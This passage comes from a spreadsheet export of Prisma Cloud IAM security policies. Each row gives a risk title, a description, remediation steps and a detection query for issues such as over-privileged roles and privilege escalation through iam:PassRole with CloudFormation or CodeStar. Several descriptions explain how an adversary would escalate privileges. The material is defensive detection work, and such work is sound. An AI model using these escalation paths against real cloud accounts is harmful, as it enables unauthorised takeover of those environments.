2. Navigate to the affected role 
3. Examine the role's trust relationship and permissions as well as its use case 
In order to remove any unnecessary permissions and minimize trusted entities which can assume the role, use the following remediation steps: 
To revoke the cross cloud service account access to assume the role altogether, browse to the role in the AWS Console and select "Trust relationships"-&gt;"Edit trust policy". Modify the role's trust relationship as per requirements. To minimize the access the service account has when using the role, under the "Permissions" tab, select the relevant policy granting administrative permissions and remove those which are unnecessary by either editing the policy or replacing it (notice: editing a managed policy could affect other roles).</t>
        </is>
      </c>
      <c r="Y314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6" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' AND dest.cloud.type = 'AWS' and action.access.isadministrative = True AND grantedby.cloud.entity.type = 'role'</t>
        </is>
      </c>
      <c r="AA3146" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3146" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3146" t="inlineStr"/>
      <c r="AD3146" t="b">
        <v>1</v>
      </c>
      <c r="AE3146" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3146" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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46" t="inlineStr">
        <is>
          <t>ae11f1c2-d147-4750-bcc5-e9862098b473</t>
        </is>
      </c>
      <c r="AI3146" t="inlineStr">
        <is>
          <t>ae11f1c2-d147-4750-bcc5-e9862098b473</t>
        </is>
      </c>
      <c r="AJ3146" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3146" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3147">
      <c r="A3147" t="inlineStr"/>
      <c r="B3147" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3147" s="2" t="inlineStr"/>
      <c r="D3147" t="inlineStr"/>
      <c r="E3147" t="inlineStr"/>
      <c r="F3147" t="inlineStr"/>
      <c r="G3147" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3147" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3147" t="inlineStr">
        <is>
          <t>AWS Okta User with IAM write permissions</t>
        </is>
      </c>
      <c r="L3147" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3147" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3147" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3147" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3147" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3147" t="inlineStr"/>
      <c r="R3147" t="inlineStr"/>
      <c r="S3147" t="inlineStr">
        <is>
          <t>IAM</t>
        </is>
      </c>
      <c r="T3147" t="b">
        <v>1</v>
      </c>
      <c r="U3147" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3147" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3147" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow Okta users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147" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Login to the Okta console
2. Find the role used by the Okta user
3. Log in to the AWS console
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y314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7"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source.idp.service = 'Okta'</t>
        </is>
      </c>
      <c r="AA3147" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3147" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3147" t="inlineStr"/>
      <c r="AD3147" t="b">
        <v>1</v>
      </c>
      <c r="AE3147" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3147" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>59a1468f-150e-469b-a099-df1d372fbb92</t>
        </is>
      </c>
      <c r="AI3147" t="inlineStr">
        <is>
          <t>59a1468f-150e-469b-a099-df1d372fbb92</t>
        </is>
      </c>
      <c r="AJ3147" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3147" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3148">
      <c r="A3148" t="inlineStr"/>
      <c r="B3148" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3148" s="2" t="inlineStr"/>
      <c r="D3148" t="inlineStr"/>
      <c r="E3148" t="inlineStr"/>
      <c r="F3148" t="inlineStr"/>
      <c r="G3148" t="b">
        <v>1</v>
      </c>
      <c r="H314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48" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3148" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3148" t="inlineStr">
        <is>
          <t>User can assume a Service Account with admin privileges in another account</t>
        </is>
      </c>
      <c r="L3148" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3148" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3148" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3148" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3148" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3148" t="inlineStr"/>
      <c r="R3148" t="inlineStr"/>
      <c r="S3148" t="inlineStr"/>
      <c r="T3148" t="b">
        <v>1</v>
      </c>
      <c r="U3148" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3148" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3148" t="inlineStr">
        <is>
          <t>Identifies users which can assume service accounts with administrative permissions in a different account. A compromise of such a user could allow an adversary to escalate their privileges and further themselves within the environment, moving laterally between the first and second account, greatly increasing the potential blast radius.</t>
        </is>
      </c>
      <c r="X3148" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the user ("Source") and the role attached to it ("Granted By Entity"). The administrative role will be shown as the "Destination".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314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8" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type = 'User' AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true AND dest.cloud.account != source.cloud.account</t>
        </is>
      </c>
      <c r="AA3148" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3148" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3148" t="inlineStr"/>
      <c r="AD3148" t="b">
        <v>1</v>
      </c>
      <c r="AE3148" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3148" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG314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48" t="inlineStr">
        <is>
          <t>1e55a4e4-b6bb-4a86-98ab-f5a8da529988</t>
        </is>
      </c>
      <c r="AI3148" t="inlineStr">
        <is>
          <t>1e55a4e4-b6bb-4a86-98ab-f5a8da529988</t>
        </is>
      </c>
      <c r="AJ3148" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3148" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3149">
      <c r="A3149" t="inlineStr"/>
      <c r="B3149" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3149" s="2" t="inlineStr"/>
      <c r="D3149" t="n">
        <v>2</v>
      </c>
      <c r="E3149" t="n">
        <v>0</v>
      </c>
      <c r="F3149" t="n">
        <v>0</v>
      </c>
      <c r="G3149" t="b">
        <v>1</v>
      </c>
      <c r="H31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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3149" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3149" t="inlineStr">
        <is>
          <t>AWS ECS Task Definition with IAM write permissions</t>
        </is>
      </c>
      <c r="L3149" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3149" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3149" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3149" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3149" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3149" t="inlineStr"/>
      <c r="R3149" t="inlineStr"/>
      <c r="S3149" t="inlineStr"/>
      <c r="T3149" t="b">
        <v>1</v>
      </c>
      <c r="U3149" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3149" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3149" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow ECS task definitions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149" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the ECS Task Definition 
3. Find the role used by the ECS Task Definition 
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y314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49"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'ecs' and source.cloud.resource.type = 'task-definition'</t>
        </is>
      </c>
      <c r="AA3149" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3149" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3149" t="inlineStr"/>
      <c r="AD3149" t="b">
        <v>1</v>
      </c>
      <c r="AE3149" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3149" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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49" t="inlineStr">
        <is>
          <t>a87da1a4-e0ec-4fbc-9a4d-a6b5c2677542</t>
        </is>
      </c>
      <c r="AI3149" t="inlineStr">
        <is>
          <t>a87da1a4-e0ec-4fbc-9a4d-a6b5c2677542</t>
        </is>
      </c>
      <c r="AJ3149" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3149" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3150">
      <c r="A3150" t="inlineStr"/>
      <c r="B3150" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3150" s="2" t="inlineStr"/>
      <c r="D3150" t="n">
        <v>4</v>
      </c>
      <c r="E3150" t="n">
        <v>45</v>
      </c>
      <c r="F3150" t="n">
        <v>0</v>
      </c>
      <c r="G3150" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3150" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3150" t="inlineStr">
        <is>
          <t>AWS Compute Instance (EC2/Lambda) Assigned IAM Policy Management Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3150" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3150" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3150" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3150" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3150" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3150" t="inlineStr"/>
      <c r="R3150" t="inlineStr"/>
      <c r="S3150" t="inlineStr"/>
      <c r="T3150" t="b">
        <v>1</v>
      </c>
      <c r="U3150" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3150" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3150" t="inlineStr">
        <is>
          <t>An adversary able to influence or change IAM policies could grant themselves extensive permissions using the policies. As such, they would obtain the ability to perform actions allowed by the policies, allowing further enumeration and exploitation of the environment.</t>
        </is>
      </c>
      <c r="X3150" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2.Navigate to the EC2 instance or Lambda Function, and either replace the role for a less privileged one, or remove it entirely. If the role is not in use by any other entities, you could simply remove the role's excessive permissions.</t>
        </is>
      </c>
      <c r="Y315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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name in ('iam:PutGroupPolicy', 'iam:PutRolePolicy', 'iam:AttachGroupPolicy', 'iam:AttachUserPolicy', 'iam:CreatePolicyVersion') AND source.cloud.resource.type IN ('instance', 'function')</t>
        </is>
      </c>
      <c r="AA3150" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3150" t="inlineStr">
        <is>
          <t>2024-06-10 06:17:24</t>
        </is>
      </c>
      <c r="AC3150" t="inlineStr"/>
      <c r="AD3150" t="b">
        <v>1</v>
      </c>
      <c r="AE3150" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3150" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>9375a27a-aee8-4710-8fff-672193b2e3b9</t>
        </is>
      </c>
      <c r="AI3150" t="inlineStr">
        <is>
          <t>9375a27a-aee8-4710-8fff-672193b2e3b9</t>
        </is>
      </c>
      <c r="AJ3150" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3150" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3151">
      <c r="A3151" t="inlineStr"/>
      <c r="B3151" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3151" s="2" t="inlineStr"/>
      <c r="D3151" t="inlineStr"/>
      <c r="E3151" t="inlineStr"/>
      <c r="F3151" t="inlineStr"/>
      <c r="G3151" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3151" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3151" t="inlineStr">
        <is>
          <t>AWS IAM effective permissions are over-privileged (7 days)</t>
        </is>
      </c>
      <c r="L3151" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3151" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3151" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3151" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3151" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3151" t="inlineStr"/>
      <c r="R3151" t="inlineStr"/>
      <c r="S3151" t="inlineStr"/>
      <c r="T3151" t="b">
        <v>1</v>
      </c>
      <c r="U3151" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3151" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3151" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3151"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
----------------------------------------
Remediation for a Resource-based Policy:
1. Log in to the AWS console
2. Navigate to the relevant service (For example, AWS S3)
3. Find resource-based policy of the resource
4. Remove the excessive actions according to the alert details</t>
        </is>
      </c>
      <c r="Y315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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and action.lastaccess.days &gt; 7</t>
        </is>
      </c>
      <c r="AA3151" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3151" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3151" t="inlineStr"/>
      <c r="AD3151" t="b">
        <v>1</v>
      </c>
      <c r="AE3151" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3151" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>eeca101d-66b7-4e59-0007-3da5435da611</t>
        </is>
      </c>
      <c r="AI3151" t="inlineStr">
        <is>
          <t>eeca101d-66b7-4e59-0007-3da5435da611</t>
        </is>
      </c>
      <c r="AJ3151" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3151" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3152">
      <c r="A3152" t="inlineStr"/>
      <c r="B3152" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3152" s="2" t="inlineStr"/>
      <c r="D3152" t="n">
        <v>0</v>
      </c>
      <c r="E3152" t="n">
        <v>0</v>
      </c>
      <c r="F3152" t="n">
        <v>264</v>
      </c>
      <c r="G3152" t="b">
        <v>1</v>
      </c>
      <c r="H31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fricieri-teste-ciem-rule,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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3152" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3152" t="inlineStr">
        <is>
          <t>AWS Groups and IAM Roles with Administrative Permissions</t>
        </is>
      </c>
      <c r="L3152" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3152" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3152" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3152" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3152" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3152" t="inlineStr"/>
      <c r="R3152" t="inlineStr"/>
      <c r="S3152" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3152" t="b">
        <v>0</v>
      </c>
      <c r="U3152" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3152" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3152" t="inlineStr">
        <is>
          <t>This policy identifies AWS Groups and IAM Roles with Administrative Permissions.
Risk of Administrative Permissions:
IAM groups and roles with active administrative permissions (elevated permissions) pose a significant security risk because:
Broad Access Potential: Unlike users with specific credentials, groups and roles can grant administrative access to a wider pool of users, increasing the attack surface. If compromised, attackers can exploit these entities to gain control over a larger number of accounts and resources.
Misuse by Assigned Users: Even with proper vetting, there's always a risk that users assigned to an administrative group or role might misuse their access unintentionally or through social engineering attacks.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning permissions. Grant administrative access only to groups and roles that absolutely require it. Regularly review and adjust permissions to minimize the scope of access.
Minimize Group and Role Membership: Limit the number of users assigned to groups or roles with administrative permissions. This reduces the potential impact of a compromise and simplifies access management.
Use Service-Specific Roles: Consider using service-specific roles with limited permissions instead of granting broader administrative access through groups or roles. This approach minimizes the potential damage if a compromise occurs.
Regular Review and Auditing: Regularly review IAM group and role memberships, especially those with administrative privileges. Conduct periodic security audits to identify potential weaknesses in your IAM configuration.
Monitor for Suspicious Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging users associated with administrative groups or roles. This vigilance can help detect unusual activity related to these entities that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3152"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152" t="inlineStr"/>
      <c r="Z3152" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.entity.type NOT IN ('user') AND grantedby.cloud.policy.type != 'Resource-based Policy' and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3152" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3152" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3152" t="inlineStr"/>
      <c r="AD3152" t="b">
        <v>1</v>
      </c>
      <c r="AE3152" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3152" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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fricieri-teste-ciem-rule - Notifications:, AccountGroups:avega-active-directory,Default Account Group,jadempsey-group-test-2,jadempsey-group-test1,PeterD,acloudsecure.com - 430182375125,new-guru,loblaw-ag,techworksgt,dmensah-shi-test,Non-Onboarded-GCP,Pramm-XSIAM,Matt's GCP Account Group,Test_Praveen_Webinar2,dm-test-Org-Tag-test,Matt's Azure Account group,jojo-test,jleech-cloud-labs,undukwo_Account,Juan Pablo Navarrete,saras account group,schwab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2" t="inlineStr">
        <is>
          <t>de61c156-3a3c-489c-b964-6a2ee8d3e972</t>
        </is>
      </c>
      <c r="AI3152" t="inlineStr">
        <is>
          <t>de61c156-3a3c-489c-b964-6a2ee8d3e972</t>
        </is>
      </c>
      <c r="AJ3152" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3152" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3153">
      <c r="A3153" t="inlineStr"/>
      <c r="B3153" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3153" s="2" t="inlineStr"/>
      <c r="D3153" t="n">
        <v>0</v>
      </c>
      <c r="E3153" t="n">
        <v>101</v>
      </c>
      <c r="F3153" t="n">
        <v>0</v>
      </c>
      <c r="G3153" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3153" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3153" t="inlineStr">
        <is>
          <t>AWS Compute Instance (EC2/Lambda) Assigned CloudFormation Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3153" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3153" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3153" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3153" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3153" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3153" t="inlineStr"/>
      <c r="R3153" t="inlineStr"/>
      <c r="S3153" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3153" t="b">
        <v>1</v>
      </c>
      <c r="U3153" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3153" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3153" t="inlineStr">
        <is>
          <t>An adversary able to create CloudFormation stacks with any role would be able to escalate their permissions by attaching a privileged role to the stack while influencing the actions taken by the created resources. As such, they would obtain the ability to perform actions using the permissions of the attached role, allowing further enumeration and exploitation of the environment.</t>
        </is>
      </c>
      <c r="X3153" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2.Navigate to the EC2 instance or Lambda Function, and either replace the role for a less privileged one, or remove it entirely. If the role is not in use by any other entities, you could simply remove the role's excessive permissions.</t>
        </is>
      </c>
      <c r="Y315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3" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:PassRole', 'cloudformation:CreateStack') AND source.cloud.resource.type IN ('instance', 'function')</t>
        </is>
      </c>
      <c r="AA3153" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3153" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3153" t="inlineStr"/>
      <c r="AD3153" t="b">
        <v>1</v>
      </c>
      <c r="AE3153" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3153" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>c6e9f36f-2a31-42bb-bf68-752b2f3c8e7b</t>
        </is>
      </c>
      <c r="AI3153" t="inlineStr">
        <is>
          <t>c6e9f36f-2a31-42bb-bf68-752b2f3c8e7b</t>
        </is>
      </c>
      <c r="AJ3153" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3153" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3154">
      <c r="A3154" t="inlineStr"/>
      <c r="B3154" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3154" s="2" t="inlineStr"/>
      <c r="D3154" t="n">
        <v>0</v>
      </c>
      <c r="E3154" t="n">
        <v>121</v>
      </c>
      <c r="F3154" t="n">
        <v>0</v>
      </c>
      <c r="G3154" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3154" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3154" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; CodeStar project permissions</t>
        </is>
      </c>
      <c r="L3154" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3154" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3154" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3154" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3154" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3154" t="inlineStr"/>
      <c r="R3154" t="inlineStr"/>
      <c r="S3154" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3154" t="b">
        <v>1</v>
      </c>
      <c r="U3154" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3154" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3154" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and codestar:CreateProject permissions, an adversary can create a new CodeStar project and pass a more privileged role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3154" t="inlineStr">
        <is>
          <t>When using iam:PassRole with any service, it should be scoped to only the resources required to pass the role to minimize the risk of privilege escalation. Follow these recommendations:
For the iam:PassRole policy statement section:
- Use the AWS pass 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5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4" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'codestar:CreateProject' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3154" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3154" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3154" t="inlineStr"/>
      <c r="AD3154" t="b">
        <v>1</v>
      </c>
      <c r="AE3154" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3154" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>301daec7-1ea6-4749-8622-825b4e718bc3</t>
        </is>
      </c>
      <c r="AI3154" t="inlineStr">
        <is>
          <t>301daec7-1ea6-4749-8622-825b4e718bc3</t>
        </is>
      </c>
      <c r="AJ3154" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3154" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3155">
      <c r="A3155" t="inlineStr"/>
      <c r="B3155" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3155" s="2" t="inlineStr"/>
      <c r="D3155" t="n">
        <v>0</v>
      </c>
      <c r="E3155" t="n">
        <v>124</v>
      </c>
      <c r="F3155" t="n">
        <v>0</v>
      </c>
      <c r="G3155" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3155" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3155" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Lambda create Function &amp; Event source mapping permissions</t>
        </is>
      </c>
      <c r="L3155" t="inlineStr">
        <is>
